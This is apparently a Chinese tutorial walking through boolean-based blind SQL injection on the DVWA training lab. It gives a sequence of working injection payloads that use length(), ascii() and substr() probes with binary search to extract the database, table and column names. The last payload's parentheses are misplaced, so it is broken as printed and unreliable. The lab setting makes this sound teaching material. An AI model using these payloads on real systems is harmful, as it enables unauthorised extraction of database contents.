显然，盲注适合于不显示任何数据查询结果的界面，而基于bool的盲注分为页面正常和不正常两种情况。

通过true和false来猜解数据的速度比较慢，通常，基于bool的盲注会采用函数length()，返回长度、ascii()，返回ASCII值，substr(string,a,b)，返回string以a开头，长度为b的字符串，count()，返回数量。

点击DVWA页面的SQL Injection(Blind)，随便输入数字发现只有两种显示结果，符合bool注入条件，构造语句猜测当前数据库名长度是否大于5：1' and length(database())>5#，如图：

说明当前数据库长度是小于5的用二分法继续构造：1' and length(database())>3#；

从长度大于3却不大于5可推测出当前数据库名长度为4，然后判断数据库名第一个字符ASCII是否大于97：1'and (ascii(substr(database(),1,1)))>97#，依旧使用二分法慢慢判断，最终确定ASCII为100，对应字符为：d；

判断数据库名第二个字符ASCII是否大于97：1'and (ascii(substr(database(),2,1)))>97#，最终确定ASCII为118，对应字符：v，同上步骤继续，最终确定当前数据库为：dvwa；

判断当前数据库中数据表的个数：1'and (select count(*) from information_schema.tables where table_schema=database())>3#,这个步骤可以有也可以没有，看完下面就知道了；

判断当前数据库中第一个数据表的长度是否大于5：1'and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5#，结果如图：

原理同上面判断数据库长度，最后得到当前数据库的第一个数据表的长度，获取第二个表的长度：1'and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)>5#，第三个，第四个以此类推，当第N个数据表长度大于0返回为假时，说明这个数据表不存在；

然后猜解当前数据库的第一个数据表的第一个字符的ASCII：1'and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>97#，结果为103，对应字符：g；

然后猜解当前数据库的第一个数据表的第二个字符的ASCII：1'and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)))>97#，结果为117，对应字符：u，

第三个，第四个字符以此类推直到猜解完毕；

猜解当前数据库中数据表users的列数：1'and (select count(*) from information_schema.columns where table_schema=database() and table_name='users')>3#，同样，这个步骤也是可以省略的；

猜解当前数据库中数据表users的第一列的长度：1'and (select length(column_name) from information_schema.columns where table_name='users' limit 0,1)>5#，当大于0为假，说明此列不存在；

猜解当前数据库数据表users的第一列字段的第一个字符：1'and (ascii(substr(select column_name from information_schema.columns where table_name='users') limit 0,1),1,1)>97#，然后依次猜解完全部字段。